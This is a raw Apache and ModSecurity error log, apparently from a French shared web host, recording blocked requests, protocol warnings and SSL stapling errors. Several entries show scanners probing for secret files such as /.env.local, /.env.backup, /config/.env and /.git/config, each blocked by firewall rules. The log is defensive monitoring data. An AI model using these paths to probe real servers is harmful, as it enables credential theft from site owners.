[Mon May 11 18:57:43.758291 2026] [security2:error] [pid 1424905:tid 1424909] [client 85.11.167.49:56412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agIKh4W8yzYoWG_eyCXJ3wAAAUE"]
[Mon May 11 18:57:43.758712 2026] [core:error] [pid 1424905:tid 1424909] [client 85.11.167.49:56412] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:43.758865 2026] [security2:error] [pid 1424905:tid 1424909] [client 85.11.167.49:56412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agIKh4W8yzYoWG_eyCXJ3wAAAUE"]
[Mon May 11 18:57:48.002216 2026] [security2:error] [pid 1502013:tid 1502041] [client 85.11.167.49:60174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.backup"] [unique_id "agIKjJYn-x0CHsbEbP2AawAAAI4"]
[Mon May 11 18:57:48.002457 2026] [security2:error] [pid 1502013:tid 1502041] [client 85.11.167.49:60174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.backup"] [unique_id "agIKjJYn-x0CHsbEbP2AawAAAI4"]
[Mon May 11 18:57:48.002842 2026] [core:error] [pid 1502013:tid 1502041] [client 85.11.167.49:60174] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:48.002986 2026] [security2:error] [pid 1502013:tid 1502041] [client 85.11.167.49:60174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.env.backup"] [unique_id "agIKjJYn-x0CHsbEbP2AawAAAI4"]
[Mon May 11 18:57:52.521191 2026] [security2:error] [pid 1501831:tid 1501846] [client 85.11.167.49:58915] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/config/.env"] [unique_id "agIKkFNddpkriGUb6ZVLcAAAAQ0"]
[Mon May 11 18:57:52.521432 2026] [security2:error] [pid 1501831:tid 1501846] [client 85.11.167.49:58915] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/config/.env"] [unique_id "agIKkFNddpkriGUb6ZVLcAAAAQ0"]
[Mon May 11 18:57:52.521835 2026] [core:error] [pid 1501831:tid 1501846] [client 85.11.167.49:58915] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:57:52.521964 2026] [security2:error] [pid 1501831:tid 1501846] [client 85.11.167.49:58915] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/config/.env"] [unique_id "agIKkFNddpkriGUb6ZVLcAAAAQ0"]
[Mon May 11 18:58:35.203430 2026] [security2:error] [pid 1501883:tid 1501895] [client 43.157.95.131:47876] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIKuzP5Q_-MBliRCAw9aQAAAAo"]
[Mon May 11 18:58:37.246177 2026] [ssl:error] [pid 1502013:tid 1502048] (EAI 2)Name or service not known: [client 3.255.93.165:36038] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 18:58:37.246452 2026] [ssl:error] [pid 1502013:tid 1502048] AH01941: stapling_renew_response: responder error
[Mon May 11 18:59:14.374697 2026] [ssl:error] [pid 1501831:tid 1501852] (EAI 2)Name or service not known: [client 114.119.130.109:52029] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 18:59:14.374782 2026] [ssl:error] [pid 1501831:tid 1501852] AH01941: stapling_renew_response: responder error
[Mon May 11 18:59:17.272069 2026] [ssl:error] [pid 1502013:tid 1502032] (EAI 2)Name or service not known: [client 114.119.130.109:52031] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 18:59:17.272101 2026] [ssl:error] [pid 1502013:tid 1502032] AH01941: stapling_renew_response: responder error
[Mon May 11 18:59:29.451227 2026] [security2:error] [pid 1501831:tid 1501855] [client 43.128.69.143:54234] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agIK8VNddpkriGUb6ZVMMAAAARY"]
[Mon May 11 18:59:30.232612 2026] [security2:error] [pid 1502013:tid 1502049] [client 43.157.20.63:44726] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agIK8pYn-x0CHsbEbP2BZwAAAJc"]
[Mon May 11 18:59:36.021536 2026] [security2:error] [pid 1502013:tid 1502059] [client 43.128.69.143:33422] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agIK-JYn-x0CHsbEbP2BbAAAAIk"], referer: http://tct-telecom.fr
[Mon May 11 19:00:11.180101 2026] [security2:error] [pid 1416109:tid 1416133] [client 49.51.52.250:53402] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agILG1V4kyjgo4bQBUiLMAAAAMM"]
[Mon May 11 19:00:18.687435 2026] [security2:error] [pid 1416109:tid 1416144] [client 49.51.52.250:33678] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agILIlV4kyjgo4bQBUiLOgAAAM4"], referer: https://letamsgarage.fr/?s=
[Mon May 11 19:00:51.775934 2026] [security2:error] [pid 1502013:tid 1502040] [client 43.166.226.57:43218] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agILQ5Yn-x0CHsbEbP2B1wAAAI0"]
[Mon May 11 19:01:31.414406 2026] [security2:error] [pid 1416109:tid 1416144] [client 196.244.192.11:29529] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:youtube_showcase_wp_session: ccf02163258102dceaf0bb5a2d77b749||1778472646||1778472286"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ventes-privees-auto.fr"] [uri "/"] [unique_id "agILa1V4kyjgo4bQBUiLtQAAAM4"]
[Mon May 11 19:01:31.423363 2026] [security2:error] [pid 1416109:tid 1416144] [client 196.244.192.11:29529] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/"] [unique_id "agILa1V4kyjgo4bQBUiLtQAAAM4"]
[Mon May 11 19:01:34.115025 2026] [security2:error] [pid 1416109:tid 1416144] [client 196.244.192.11:29529] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agILa1V4kyjgo4bQBUiLtQAAAM4"]
[Mon May 11 19:01:40.563679 2026] [:error] [pid 1416109:tid 1416146] [client 74.7.242.30:33490] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/serveurs-dedies-virtuels/
[Mon May 11 19:01:59.279024 2026] [security2:error] [pid 1501883:tid 1501893] [client 43.157.170.126:40358] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "maelbailly.fr"] [uri "/"] [unique_id "agILhzP5Q_-MBliRCAw-3QAAAAg"]
[Mon May 11 19:02:03.963581 2026] [security2:error] [pid 1416109:tid 1416149] [client 43.157.170.126:43412] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agILi1V4kyjgo4bQBUiL9wAAANM"], referer: http://maelbailly.fr
[Mon May 11 19:02:08.930744 2026] [security2:error] [pid 1424905:tid 1424922] [client 43.130.100.35:47748] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/on-vous-attend-a-la-brasserie/"] [unique_id "agILkIW8yzYoWG_eyCXLfAAAAU4"]
[Mon May 11 19:02:15.625621 2026] [core:error] [pid 1416109:tid 1416139] [client 47.128.37.181:40344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:02:15.625663 2026] [core:error] [pid 1416109:tid 1416139] [client 47.128.37.181:40344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:03:00.326875 2026] [security2:error] [pid 1501831:tid 1501833] [client 43.134.224.16:38824] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agILxFNddpkriGUb6ZVNgQAAAQA"]
[Mon May 11 19:03:04.680292 2026] [security2:error] [pid 1416109:tid 1416148] [client 43.130.102.7:45628] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nearoo.fr"] [uri "/"] [unique_id "agILyFV4kyjgo4bQBUiMXgAAANI"]
[Mon May 11 19:04:23.274840 2026] [security2:error] [pid 1416109:tid 1416129] [client 101.32.128.28:56940] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIMF1V4kyjgo4bQBUiMwgAAAMA"]
[Mon May 11 19:04:26.709521 2026] [security2:error] [pid 1416109:tid 1416143] [client 101.32.128.28:60850] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agIMGlV4kyjgo4bQBUiM0AAAAM0"], referer: http://rentparadise.fr
[Mon May 11 19:04:54.560346 2026] [security2:error] [pid 1424905:tid 1424912] [client 216.73.216.117:6442] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: a2737ae24b931b23a19b93382cab1040||1778520894||1778520534"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agIMNoW8yzYoWG_eyCXMcAAAAUQ"]
[Mon May 11 19:04:54.560563 2026] [security2:error] [pid 1424905:tid 1424912] [client 216.73.216.117:6442] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agIMNoW8yzYoWG_eyCXMcAAAAUQ"]
[Mon May 11 19:04:54.960102 2026] [security2:error] [pid 1424905:tid 1424912] [client 216.73.216.117:6442] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIMNoW8yzYoWG_eyCXMcAAAAUQ"]
[Mon May 11 19:04:57.658045 2026] [:error] [pid 1502013:tid 1502044] [client 194.187.171.159:58028] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 19:05:23.385821 2026] [:error] [pid 1501883:tid 1501894] [client 95.215.32.14:61302] File does not exist: /home/nearoofr/public_html/index.php
[Mon May 11 19:06:04.919682 2026] [security2:error] [pid 1424905:tid 1424928] [client 193.189.100.200:40573] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/patrimoine-mode-d-emploi/6"] [unique_id "agIMfIW8yzYoWG_eyCXM1gAAAVQ"]
[Mon May 11 19:06:05.083334 2026] [security2:error] [pid 1502013:tid 1502050] [client 35.196.234.191:53574] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agIMfZYn-x0CHsbEbP2EEQAAAJg"]
[Mon May 11 19:06:05.083505 2026] [security2:error] [pid 1502013:tid 1502050] [client 35.196.234.191:53574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agIMfZYn-x0CHsbEbP2EEQAAAJg"]
[Mon May 11 19:06:05.084909 2026] [security2:error] [pid 1502013:tid 1502050] [client 35.196.234.191:53574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIMfZYn-x0CHsbEbP2EEQAAAJg"]
[Mon May 11 19:06:08.753736 2026] [security2:error] [pid 1502013:tid 1502030] [client 193.189.100.200:17055] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/contact"] [unique_id "agIMgJYn-x0CHsbEbP2EJAAAAIA"]
